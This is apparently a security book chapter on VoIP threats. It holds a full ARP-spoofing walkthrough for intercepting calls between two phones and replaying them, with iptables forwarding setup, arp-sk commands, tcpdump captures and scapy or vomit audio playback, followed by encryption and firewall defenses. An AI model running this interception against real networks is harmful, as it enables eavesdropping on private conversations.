| ||
Voice over IP (VoIP) is a very generic term that is used to describe the transport of voice on top of an IP network. A VoIP deployment can range from a very basic setup to enable a point-to-point communication between two users to a full carrier-grade infrastructure in order to provide new communication services to customers and end users. Most VoIP solutions rely on multiple protocols, at least one for signaling and one for transport of the encoded voice traffic. Currently the two most common signaling protocols are H.323 and Session Initiation Protocol (SIP), and their role is to manage call setup, modification, and closing.
H.323 is actually a suite of protocols defined by the International Telecommunication Union (ITU), and the encoding is ASN.1. The deployed base is still larger than SIP, and it was designed to make integration with the public switched telephone network (PSTN) easier.
SIP is the Internet Engineering Task Force (IETF) protocol, and the number of deployments using it or migrating over from H.323 is growing rapidly . SIP is not only used to signal voice traffic, but it also drives a number of other solutions and tools, such as instant messaging (IM). SIP is similar in style to the HTTP protocol, and it implements different methods and response codes. The encoding is text (UTF8), and SIP uses port 5060 (TCP/UDP) for communication.
The Real-time Transport Protocol (RTP) transports the encoded voice traffic. The control channel for RTP is provided by the Real-time Control Protocol (RTCP) and consists mainly of quality of service (QoS) information (delay, packet loss, jitter, and so on). RTP runs on top of UDP, and both the source and destination port may be dynamic (5004/UDP is common). RTP doesn't handle the QoS, because this needs to be provided by the network (packet/frame marking, classification, and queuing).
There's one major difference between traditional voice networks using a PBX and a VoIP setup: In the case of VoIP, the RTP stream doesn't have to cross any voice infrastructure device and is exchanged directly between the endpoints (that is, RTP is phone-to-phone ).
The more advanced or more complex solutions rely on many additional protocols: RADIUS or LDAP for user and credentials management, proprietary protocols for multimedia extensions, and TFTP/DHCP/DNS when the phone boots up, and so on.
VoIP setups are prone to a wide number of attacks. This is mainly due to the facts that you need to expose a large number of interfaces and protocols to the end user, that the quality of service on the network is a key driver for the quality of the VoIP system, and also because the infrastructure is usually quite complex.
The easiest attack, even if not very rewarding , is the denial of service. It is easy to do, quite anonymous, and very effective. You can, for example, DoS the infrastructure by sending a large number of fake call setups signaling traffic (SIP INVITE) or a single phone by flooding it with unwanted traffic (unicast or multicast). Any network denial of service (intended or due to a worm) will have an adverse effect on the quality of the VoIP system in case the network is not QoS enabled.
Call spoofing (that is, identity theft) is another quite common attack: It enables the user to spoof the CLID (Caller ID) while making a call. This may enable access to the legitimate user's voicemail if the system only relies on the CLID and doesn't require a PIN.
Injection of data into an established communication is also doable, but more complex, and the result may not be perfect (that is, the parties may notice it). This can be done by injecting RTP packets, but some TCP/IP stacks on intermediate systems (gateways) or end systems (soft or hard phone) may behave in strange ways (leading sometimes to a crash) when they receive out-of-sequence or nearly duplicate RTP data.
Altering the phone's configuration is usually quite simple. If you have network connectivity to the phone, you can try to access it using the common management interfaces that may be exposed, such as an unprotected telnet CLI or HTTP interface (with a simple password or no password at all, sometimes not even requiring a username). If this access isn't granted, you can try to take over the phone using your own DHCP and TFTP servers: When the phone boots, it first gets an IP address and network information via DHCP and then download its configuration (and sometimes updated firmware) over TFTP. Depending on whether the deployment relies only on IP addresses or not, the DNS protocol may part of the process as well and DNS spoofing may be helpful, too.
Most of the new applications linked with VoIP deployments (such as advanced voicemail, instant messaging, calendar services, but also user management) are web-based services. These applications are often full of bugs (cross-site scripting, JavaScript used to do form field verification on the client side, no boundary checking, SQL injection, and so on), and the known methods used to penetrate web applications can be used to get access to the system and get access to value-added numbers , other users' voicemail, Call Detail Records (CDRs), and so on.
In some environments, where all calls are recorded (for legal reasons, for example), gaining access to the call storage system may give access to sensible and confidential information. Obviously this is the pot of gold at the end of the rainbow for many attackers , so implementing strong host-based security (as described in previous chapters) is critical.
Fraud detection is another issue that concerns mainly carriers and telecommunication companies: Users shouldn't be able to access value-added numbers if they're not allowed to or able to send RTP traffic without the correct signaling being completed with the call manager servers. This is especially important for companies providing VoIP-toPSTN gateways.
Also, as with e-mail, the absence of SIP header stripping may leak topology and other interesting information to an attacker.
Popularity: | 5 |
Simplicity: | 5 |
Impact: | 9 |
Risk Rating: | 6 |
Although the interception attack may sound simple and straightforward, it's usually the one that impresses the most. First, you need to intercept the RTP stream: You may sit somewhere on the path between the caller and the called persons, but that's not often the case anymore due to the use of switches instead of hubs. To overcome this problem, an attacker can employ ARP spoofing. ARP spoofing works well on many enterprise networks because the security features available in switches today are not often activated, and end systems will happily accept the new entries. Quite a number of deployments try to transport the VoIP traffic on a dedicated VLAN on the network to simplify the overall manageability of the solution as well as to enhance the quality of service. An attacker should easily be able to access the VoIP VLAN from any desk, because the phone is generally used to provide connectivity to the PC and performs the VLAN tagging of the traffic.
On the interception server, you should first turn on routing, allow the traffic, turn off ICMP redirects, and then reincrement the TTL using iptables (it will be decremented because the Linux server is routing and not bridgingthis in the simple patch-o-matic extension to iptables), as shown here:
# echo 1 > /proc/sys/net/ipv4/ip_forward # iptables -I FORWARD -i eth0 -o eth0 -j ACCEPT # echo 0 > /proc/sys/net/ipv4/conf/eth0/send_redirects # iptables -t mangle -A FORWARD -j TTL --ttl-inc 1
At this point, after using dsniff's arpspoof (http://www. monkey .org/~dugsong/dsniff) or arp-sk (http://www.arp-sk.org) to corrupt the client's ARP cache, you should be able to access the VoIP datastream using a sniffer.
In our example, we have the following:
Phone_A | 00:50:56:01:01:01 | 192.168.1.1 |
Phone_B | 00:50:56:01:01:02 | 192.168.1.2 |
Bad_guy | 00:50:56:01:01:05 | 192.168.1.5 |
The attacker, whom we will call Bad_guy, has a MAC/IP address of 00:50:56:01:01:05/192.168.1.5 and uses the eth0 interface to sniff traffic:
# arp-sk -w -d Phone_A -S Phone_B -D Phone_A + Initialization of the packet structure + Running mode "who-has" + Ifname: eth0 + Source MAC: 00:50:56:01:01:05 + Source ARP MAC: 00:50:56:01:01:05 + Source ARP IP : 192.168.1.2 + Target MAC: 00:50:56:01:01:01 + Target ARP MAC: 00:00:00:00:00:00 + Target ARP IP : 192.168.1.1 ---Start classical sending --- TS: 20:42:48.782795 To: 00:50:56:01:01:01 From: 00:50:56:01:01:05 0x0806 ARP Who has 192.168.1.1 (00:00:00:00:00:00) ? Tell 192.168.1.2 (00:50:56:01:01:05) TS: 20:42:53.803565 To: 00:50:56:01:01:01 From: 00:50:56:01:01:05 0x0806 ARP Who has 192.168.1.1 (00:00:00:00:00:00) ? Tell 192.168.1.2 (00:50:56:01:01:05)
At this point, Phone_A thinks that Phone_B is at 00:50:56:01:01:05 (Bad_guy). The tcpdump output shows the ARP traffic:
# tcpdump -i eth0 -ne arp 20:42:48.782992 00:50:56:01:01:05 > 00:50:56:01:01:01, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.1 tell 192.168.1.2 20:42:55.803799 00:50:56:01:01:05 > 00:50:56:01:01:01, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.1 tell 192.168.1.2
Now, here's the same attack against Phone_B in order to sniff the return traffic:
# arp-sk -w -d Phone_B -S Phone_A -D Phone_B + Initialization of the packet structure + Running mode "who-has" + Ifname: eth0 + Source MAC: 00:50:56:01:01:05 + Source ARP MAC: 00:50:56:01:01:05 + Source ARP IP : 192.168.1.1 + Target MAC: 00:50:56:01:01:02 + Target ARP MAC: 00:00:00:00:00:00 + Target ARP IP : 192.168.1.2 ---Start classical sending --- TS: 20:43:48.782795 To: 00:50:56:01:01:02 From: 00:50:56:01:01:05 0x0806 ARP Who has 192.168.1.2 (00:00:00:00:00:00) ? Tell 192.168.1.1 (00:50:56:01:01:05) TS: 20:43:53.803565 To: 00:50:56:01:01:02 From: 00:50:56:01:01:05 0x0806 ARP Who has 192.168.1.2 (00:00:00:00:00:00) ? Tell 192.168.1.1 (00:50:56:01:01:05)
At this point, Phone_B thinks that Phone_A is also at 00:50:56:01:01:05 (Bad_guy). The tcpdump output shows the ARP traffic:
# tcpdump -i eth0 -ne arp 20:43:48.782992 00:50:56:01:01:05 > 00:50:56:01:01:02, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.2 tell 192.168.1.1 20:43:55.803799 00:50:56:01:01:05 > 00:50:56:01:01:02, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.2 tell 192.168.1.1
Now that the environment is ready, Bad_guy can start to sniff the UDP traffic:
# tcpdump -i eth0 -n host 192.168.1.1 21:53:28.838301 192.168.1.1.27182 > 192.168.1.2.19560: udp 172 [tos 0xb8] 21:53:28.839383 192.168.1.2.19560 > 192.168.1.1.27182: udp 172 21:53:28.858884 192.168.1.1.27182 > 192.168.1.2.19560: udp 172 [tos 0xb8] 21:53:28.859229 192.168.1.2.19560 > 192.168.1.1.27182: udp 172
Because in most cases the only UDP traffic that the phones are sending is the RTP stream, it's quite easy to identify the local ports (27182 and 19560, in the preceding example). A better approach is to follow the SIP exchanges and get the port information from the Media Port field in the Media Description section.
Once you have identified the RTP stream, you need to identify the codec that has been used to encode the voice. You find this information in the Payload Type (PT) field in the UDP stream or in the Media Format field in the SIP exchange that identifies the format of the data transported by RTP. The most basic phones that don't use a bandwidth-friendly codec use G.711, also known as Pulse Code Modulation (PCM) , or G.729 for the ones that want to optimize bandwidth usage.
A tool such as vomit (http://vomit.xtdnet.nl) enables you to convert the conversation from G.711 to WAV based on a tcpdump output file. The following command will play the converted output stream on the speakers using waveplay:
$ vomit -r sniff.tcpump waveplay -S8000 -B16 -C1
A better tool is scapy (http://www.secdev.org/projects/scapy). With scapy, you can sniff the live traffic (from eth0), and scapy will decode the RTP stream (G.711) from/to the phone at 192.168.1.1 and feed the voice over two streams that it regulates (when there's no voice, there's no traffic, for example) to soxmix, which in turn will play it on the speakers:
# ./scapy Welcome to Scapy (0.9.17.20beta) >\>> voip_play("192.168.1.1", iface="eth0")
Another advantage of scapy is that it will decode all the lower transport layers transparently . You can, for example, play a stream of VoIP transported on a WEP-secured WLAN directly if you give scapy the WEP key. To do this, you first need to enable the WLAN's interface monitor mode:
# iwconfig wlan0 mode monitor # ./scapy Welcome to Scapy (0.9.17.20beta) >\>> conf.wepkey="enter_WEP_key_here" >\>> voip_play("192.168.1.1", iface="wlan0")
In case the physical port you connect to is a trunk, you first need to make sure your kernel supports VLANs/dot1q and then load the kernel module, configure the VLAN, and put an IP address on the virtual interface so that it creates the correct/proc entry:
# modprobe 8021q # vconfig add eth0 187 Added VLAN with VID == 187 to IF -:eth0:- # ifconfig eth0.187 192.168.1.5
When this is done, you can use the commands listed earlier with eth0.187 instead of eth0. If you run tcpdump on the interface eth0 instead of eth0.187, you'll see the Ethernet traffic with the VLAN ID (that is, tagged):
# tcpdump -i eth0 -ne arp 17:21:42.882298 00:50:56:01:01:05 > 00:50:56:01:01:01 8100 46: 802.1Q vlan#187 P0 arp who-has 192.168.1.1 tell 192.168.1.2 17:21:47.882151 00:50:56:01:01:05 > 00:50:56:01:01:01 8100 46: 802.1Q vlan#187 P0 arp who-has 192.168.1.1 tell 192.168.1.2
We have shown you how to intercept traffic directly between two phones. You could use the same approach to capture the stream between a phone and a gateway or between two gateways.
Another interception approach, which is close to the one used to take over a phone while it boots, uses a fake DHCP server. You can then give the phone your IP as the default gateway and at least get one side of the communication.
A number of defense and protection features are built into most of the recent hardware and software, but quite often they are not used. Sometimes this is for reasons that are understandable (such as the impact of end-to-end encryption on delay and jitter, but also due to regulations and laws), but way too often it's because of laziness .
Encryption is available in Secure RT(C)P, Transport Layer Security (TLS), and Multimedia Internet Keying (MIKEY), which can be used with SIP. H.235 provides security mechanisms for H.323.
Moreover, firewalls can and should be deployed to protect the VoIP infrastructure core . When selecting a firewall, you should make sure it handles the protocols at the application layer; a stateful firewall isn't often enough because the needed information is carried in different protocols' header or payload data. Network edge components such as border session controllers help to protect the customer and partner- facing system against denial of service attacks and rogue RTP traffic.
The phones should only download signed configurations and firmware, and they should also use TLS to identify the servers, and vice versa. Keep in mind that the only difference between a phone and a PC is its shape. Therefore, as with any system, you need to take host security into account when deploying handsets in your network.